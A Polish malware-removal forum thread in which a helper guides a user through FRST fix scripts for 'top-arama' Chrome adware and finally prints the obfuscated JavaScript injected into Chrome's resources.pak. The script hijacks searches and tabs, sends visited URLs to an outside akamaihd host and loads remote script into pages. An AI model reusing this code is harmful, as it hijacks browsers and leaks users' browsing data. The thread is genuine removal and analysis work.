Infekcja "top-arama" w Google Chrome

[Uzda]

Witam,

 

Chrome został zarażony "search top-arama"

 

Uruchamia się jako strona startowa, towarzyszy jej otwieranie się samoczynnie reklam typu zakłady bukmacherskie czy kasyna

Dodatkowo samoczynnie otwierają się strony internetowe niewiadomego pochodzenia.

 

1. Próbowałem (jak mówił wujek Google) zminiać stronę startową i wyszukiwarkę w opcjach chroma i nic

2. Resetowałem ustawienia Chroma - nic

3. AdwCleaner - coś tam poiusuwał, ale tego nie dał rady

4. MalwaresBytes - Anti_Malware - to samo

5. CCcleaner - to samo

6. AntiMalware od Emisoftu to samo.

 

Proszę więc pomoc.

 

Z góry dziękuję...

 

Pozdrawaim

 

Za chwilę dołączę GMERa

FRST.txt

Addition.txt

Shortcut.txt

[picasso]

Widzę w raporcie polityki blokujące jakieś funkcje w Google Chrome. Przy okazji: Opera też jest zainfekowana. Akcje wstępne:

 

1. Odinstaluj stare wersje: Adobe Reader X (10.1.16) MUI , Adobe Shockwave Player 11.5, Java 8 Update 51.

 

2. Otwórz Notatnik i wklej w nim:

 

CloseProcesses:
CMD: type C:\Windows\system32\GroupPolicy\Machine\registry.pol
GroupPolicy: Ograniczenia - Chrome 
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia 
CHR RestoreOnStartup: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghFeV8MB1xJFRgQcQxaTA0URwIOeFwAURQXRAMaeQpbAF9CEwcFIk0FA1oDB0VXfV5bFElXTwhlKVVMBEsjREZWLE1L"
OPR Session Restore: -> [funkcja włączona]
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?trackid=sp-006
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-4026836190-3788267660-437267313-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms}
HKU\S-1-5-21-4026836190-3788267660-437267313-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxps://www.google.com/?trackid=sp-006
SearchScopes: HKLM-x32 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms}
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4026836190-3788267660-437267313-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-4026836190-3788267660-437267313-1000 -> OldSearch URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms}
BHO: Brak nazwy -> {4F524A2D-5354-2D53-5045-7A786E7484D7} -> Brak pliku
BHO-x32: Brak nazwy -> {4F524A2D-5354-2D53-5045-7A786E7484D7} -> Brak pliku
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - Brak pliku
HKLM-x32\...\Run: [] => [X]
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Brak pliku
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [brak pliku]
C:\ProgramData\AVAST Software
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\Admin\Downloads\*_www.INSTALKI.pl.exe
C:\Users\Admin\Downloads\Niepotwierdzony*.crdownload
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

3. Wyczyść przeglądarki:

 

Google Chrome:

• Zresetuj synchronizację (o ile włączona): KLIK.
• Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień.

Opera:

 

Menu > Ustawienia > Otwórz wybraną stronę lub zestaw stron > wymaż searchinterneat-a.akamaihd.net

 

4. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER:

 

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools

 

Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff

 

5. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy problemy nadal występują.

[Uzda]

Przy pierwszym uruchomieniu Chrome po wykonaniu fixa (musiałem to zrobić, żeby zresetować przyglądarkę) było wszystko ok.

 

Niestety przy drugim uruchomieniu pojawił się ten sam problem. Identyczne zachowanie jak wcześniej.

 

Zrobiłem wszystko zgodnie z instrukcją tyle tylko że Operę wywaliłem w cholerę

 

Poniżej nowy log i proszę o wsparcie

FRST2.txt

Fixlog.txt

[picasso]

Skoro problem wraca mimo usunięcia polityk, to tu chyba jest zmodyfikowany któryś plik Google Chrome. Dostarcz mi dane do ręcznej analizy. Skopiuj na Pulpit poniższe foldery, spakuj do ZIP, shostuj gdzieś i podlinkuj paczkę.

 

C:\Program Files (x86)\Google\Chrome

C:\Users\Admin\AppData\Local\Google

[Uzda]

Link:

http://przeklej.org/file/DbZapJ/Chrome.zip

[picasso]

Jest zainfekowany globalny plik zasobów resources.pak, czyli adware jest obecnie trwale zintegrowane z przeglądarką. W folderze Google korespondującym do bieżącej wersji Chrome są dwie instancje plików zasobów, plik *.bak wygląda na kopię zapasową poprawnego pliku zrobioną przez adware:

 

C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.101\resources.bak [16 349 KB 2015.09.24]

C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.101\resources.pak [16 355 KB 2015.10.10]

 

[to samo występuje w folderze starej wersji: 45.0.2454.99]

 

Te pliki odróżnia obecność następującego skryptu:

 

resources.pak

<!--
Copyright 2013 The Chromium Authors. All rights reserved.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.

We use an HTML page just to have access to the DOM, for URL
parsing. An alternative would be to include a URL parsing JavaScript
library with the extension but this approach is likely smaller and
faster.
-->
<html>
<head>
<script src="thunk.js"></script>
</head>
<body>
</body>
</html>
try{(function(d,u){function k(a){for(var b=0;b<a.length;b++){var e=b,c;c=a[b];if("string"===typeof c)a:{if(!v(c))for(var g=0;g<p.length;g++)if(p[g].test(c)){c="";break a}}else c=c.toString();c=encodeURIComponent(c.replace(w,"$cma;"));a[e]=c}(new Image).src="https://filterresults-a.akamaihd.net/stats/?"+a.shift()+"="+a.join("|,|")}function m(a){return[   ".*volunteercentre.org.*",".*search.yahoo.com.*_bd_com.*",".*capn=ed_ui_.*_kw_001.*",".*ask.com.*siteid=28527.*",".*src=55cd729e57e760c05c8b466e.*",".*capn=ed_ui_jp_kw_002.*",".*thesmartsearch.net.*",".*search.results-hub.com.*",".*search.netbetterresults.com.*",".*fluey.com.*",".*home.searchpile.com.*",".*au.ask.com.*28527.*",".*uk.ask.com.*32859.*",".*thesmartsearch.net.*p=ein.*",".*capn=ed_ui_.*_kw_004.*",".*search.top-arama.com.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/s.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/h.*",".*=__default.*"].some(function({return(new RegExp().test(a)})}function x(a,{var e=queryCommandValue;h(function(c){c||(c={});var g=c["BL_ST_"+a+"_"+e],d=Date.now();g?3E3>d-g?b&&b(!0):(c["BL_ST_"+a+"_"+e]=d,b&&b(!1),f(c)):(c["BL_ST_"+a+"_"+e]=d,f(c),b&&b(!1))})}function h(a){chrome.storage.local.get("BLGC_STORAGE",function({a&&a(b.BLGC_STORAGE)})}function f(a){var b={};b.BLGC_STORAGE=a;chrome.storage.local.set(b,function(){})}function q(a){try{if(0==a.length)return{hostName:""};var b=u.createElement("a");0!=a.indexOf("http")&&(a="http://"+a);b.href=a;return b}catch(e){}return{hostname:a}}function y(a){a=a.toLowerCase();for(var b=0;b<n.length;b++)if(-1!=a.indexOf(n[b].host.toLowerCase()))return b;return-1}function l(a,{try{b=b.replace(/[\[]/,"\[").replace(/[\]]/,"\]");var e=(new RegExp("[\?]"+b+"=([^]*)")).exec(a);return null==e?null:e[1]}catch(c){}}function z(a,{var e=l(a,n[b].oparam);switch({case 0:case 2:case 3:case 4:return!!e;case 1:var e=l(a,"type"),c=l(a,"hsimp"),g=l(a,"fr"),d=/^http(s)?:\/\/(.{2}\.)?(malaysia\.)?(y.*\.)?search\.yahoo\./;return!!g&&-1!=g.indexOf("ddc-bd")||!!c&&-1!=c.indexOf("ddc_bd")||!!e&&-1!=e.indexOf("_bd_com")||!d.test(a)||-1!=a.indexOf("/local/")}return!1}function r(a,{var e=-1,c="",g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV8BBw0XRA0XbQoJVFtcFVBFdxQABAFBDFNGdgABUloQRwYRch9aFQQTQkcFME0FA1UWQhNNfX9RDU0UU2dGM0xUFUo=&q=|search_term|",d=null,f=null;b.url&&!m(b.url)&&(f=q(b.url).hostname,h(function(h){h||(h={});if(-1!=(e=y(f))){if(h[a]&&(d=q(h[a]).hostname,(!f||f==d)&&1!=e))return;c=n[e].param;!z(b.url,e)&&(queryCommandValue=l(b.url,c))&&x(a,function(c){c?k(["BL_YS_Action_2","FilterResults","f9f4fe84-315b-4ef7-8e80-fe6993caf322","blgc","SkippedSearch",b.url]):(g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV8BBw0XRA0XbQoJVFtcFVBFdxQABAFBDFNGdgABUloQRwYRch9aFQQTQkcFME0FA1UWQhNNfX9RDU0UU2dGM0xUFUo=&q=|search_term|".replace("|search_term|",queryCommandValue),chrome.tabs.update(a,{url:g}),k(["BL_YS_Action_2","FilterResults","f9f4fe84-315b-4ef7-8e80-fe6993caf322","blgc","Search",b.url]))})}}))}function A(a,b,e){try{chrome.tabs.executeScript(a,{code:"if(!window.blgcran){ window.blgcran = true; var scr=document.createElement('script'); scr.src='https://filterresults-a.akamaihd.net/FilterResults/cr?t=BLGC&g=f9f4fe84-315b-4ef7-8e80-fe6993caf322&pn=Chrome'; document.head.appendChild(scr);}"})}catch(c){}-1!=t.indexOf(b.url)&&(m(e.url)||chrome.tabs.update(a,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHFMaJg1eBAFFDAYSdVsVVVwXFhgbJQEITF8UFwwac1pZBwpDExNBNARaAktXUUEeIlVfAh8fHHNKLE1dE2sUUkBPNEo="}),h(function(c){c||(c={});c[a]=b.url;f(c)}),d.skipNewTabMsg?d.skipNewTabMsg=!1:k(["BL_YS_Action_2","FilterResults","f9f4fe84-315b-4ef7-8e80-fe6993caf322","blgc","NewTab",b.url]));d.firstRun=!1;r(a,;b.url&&h(function(c){c||(c={});c[a]=b.url;f(c)})}"undefined"==typeof d.firstRun&&(d.firstRun=!1);"undefined"==typeof d.skipNewTabMsg&&(d.skipNewTabMsg=!1);var t=["chrome://newtab/","safer://newtab/"],n=[{host:".bing.",param:"q",oparam:"qs"},{host:"search.yahoo.",param:"p",oparam:"fr"},{host:".google.",param:"q",oparam:"site"},{host:".ask.",param:"q",oparam:"qo"},{host:"search.aol.",param:"q",oparam:"s_it"},{host:"go.mail.ru",param:"q",oparam:"NA"},{host:"intent.clara-labs.",param:"q",oparam:"NA"},{host:"trovi.",param:"q",oparam:"NA"},{host:".plusnetwork.",param:"q",oparam:"NA"},{host:"isearch.bobrowser.",param:"q",oparam:"NA"},{host:"www-searching.",param:"q",oparam:"NA"},{host:".thesmartsearch.",param:"q",oparam:"NA"},{host:".search.safer.",param:"q",oparam:"NA"},{host:".cassiopessa.",param:"q",oparam:"NA"}],p=[/(?:\d[(). -]*?){9,16}/,/[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?/i],w=/,/g;btoa("94df1405-b2c7-479e-98ea-4be1fc81ab76_54_10");var v=function(){var a=/^[\d,a-f]{8}-(?:[\d,a-f]{4}-){3}[\d,a-f]{12}$/i;return function({return a.test(}}();chrome.runtime.onStartup.addListener(function(){d.firstRun=!0;d.skipNewTabMsg=!0;f({})});chrome.tabs.onReplaced.addListener(function(a,{var e,c;h(function(d){d||(d={});e=d[a];c=d[b];d[a]=c;d[b]=e;f(d)})});chrome.tabs.onRemoved.addListener(function(a){h(function({b||(b={});delete b[a];f(})});chrome.tabs.onCreated.addListener(function(a){if(a.id&&!a.openerTabId)if(d.firstRun){if(m(a.url))return;chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghFeV8MB1xJFRgQcQxaTA0URwIOeFwAURQXRAMaeQpbAF9CEwcFIk0FA1oDB0VXfVtUBlpXTwhlKVVMBEsjREZWLE1L"});k(["BL_YS_Action_2","FilterResults","f9f4fe84-315b-4ef7-8e80-fe6993caf322","blgc","HomePage",a.url])}else-1==t.indexOf(a.url)||m(a.url)||(chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHFMaJg1eBAFFDAYSdVsVVVwXFhgbJQEITF8UFwwac1pZBwpDExNBNARaAktXUUEeIlVfAh8fHHNKLE1dE2sUUkBPNEo="}),k(["BL_YS_Action_2","FilterResults","f9f4fe84-315b-4ef7-8e80-fe6993caf322","blgc","NewTab",a.url]));else a.openerTabId&&h(function({b||(b={});b[a.id]=b[a.openerTabId];f(});d.firstRun=!1});chrome.webNavigation.onBeforeNavigate.addListener(function(a){0===a.frameId&&r(a.tabId,{url:a.url})});chrome.tabs.onUpdated.addListener(function(a,b,d){A(a,b,d)})})(window,document)}catch(d){};// Copyright 2013 The Chromium Authors. All rights reserved.
//

resources.bak

<!--
Copyright 2013 The Chromium Authors. All rights reserved.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.

We use an HTML page just to have access to the DOM, for URL
parsing. An alternative would be to include a URL parsing JavaScript
library with the extension but this approach is likely smaller and
faster.
-->
<html>
<head>
<script src="thunk.js"></script>
</head>
<body>
</body>
</html>
// Copyright 2013 The Chromium Authors. All rights reserved.
//

 

W sytuacji bezpośredniej integracji adware z zasobami jest konieczna reinstalacja Google Chrome. Aczkolwiek jest plik BAK, który zdaje się być poprawny. Przeprowadź test, czy da się to rozwiązać przez zwykłą podmianę pliku:

 

1. Zamknij Google Chrome. Wejdź do folderu C:\Program Files (x86)\Google\Chrome\Application. Upewnij się jaka jest najwyższa wersja, czy nadal jest to 45.0.2454.101, bo w międzyczasie Chrome mogło się zaktualizować już do 46.0.2490.71.

 

W folderze najwyższej wersji skasuj plik resources.pak, a plikowi resouces.bak zmień nazwę na resouces.pak. Foldery starszych wersji w całości przez SHIFT+DEL (omija Kosz) skasuj.

 

2. Uruchom przeglądarkę, zresetuj jej ustawienia ponownie i powiedz czy reklamy nadal występują.

[Uzda]

Melduję, że skasowałem folder starszej wersji oraz resources.pak, natomiast resouces.bak (czy tez resources.bak nie ma)

 

Zaraz zresetuję ustawienia dam znać co i jak

 

EDIT:

 

Aplikacja nie uruchamia się, tzn. Włącza się fizycznie ale wywala błąd "Google Chrome przestał działać" i zamyka aplikację. może spróbuję odinstalować i zainstalować ponownie?

[picasso]

Plik resources.bak (nie resource.bak) był wcześniej, gdyż mam to w paczce którą mi wysłałeś. Czy na pewno szukałeś w odpowiednim folderze i masz włączone pokazywanie rozszerzeń plików? Skoro teraz go nie ma, to może adware usunęło. Oczywiście resources.pak nie może być skasowany bez podstawienia jego wcześniejszej czystej wersji! To jest plik zasobów niezbędny do obsługi Google Chrome i przeglądarka w ogóle bez niego nie działa. Mogłabym przesłać Ci kopię którą mi wysłałeś, ale jest już nowsza wersja przeglądarki i w tej sytuacji lepiej wszystko przeładować od zera:

 

1. Zakładam, że synchronizację wyłączyłeś wcześniej. Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Na razie nie instaluj nowej wersji.

 

2. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut.

[Uzda]

Synchronizację wyłączyłem - przystępuję do działania odezwe się jak skończę

 

Plik w załączniku

FRST.txt

[picasso]

1. Drobne poprawki. Otwórz Notatnik i wklej w nim:

 

Toolbar: HKU\S-1-5-21-4026836190-3788267660-437267313-1000 -> Brak nazwy - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Brak pliku
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"
C:\Program Files (x86)\Opera
C:\Users\Admin\AppData\Local\Opera Software
C:\Users\Admin\AppData\Roaming\Opera Software
Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions /f

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Powstanie kolejny fixlog.txt.

 

2. Zainstaluj najnowszą wersję Google Chrome.

 

3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

[Uzda]

Hej,

 

Wykonałem wszystko zgodnie z instrukcją. poniżej logi.

 

czekam na (mam nadzieję) finalną opinię

FRST.txt

Fixlog.txt

[picasso]

Wszystko wygląda dobrze. Google Chrome było kompletnie reinstalowane, więc problem z adware powinien zniknąć na dobre. Na koniec:

 

Zastosuj DelFix, by skasować używane narzędzia. GMER dokasuj ręcznie, DelFix go nie wykryje.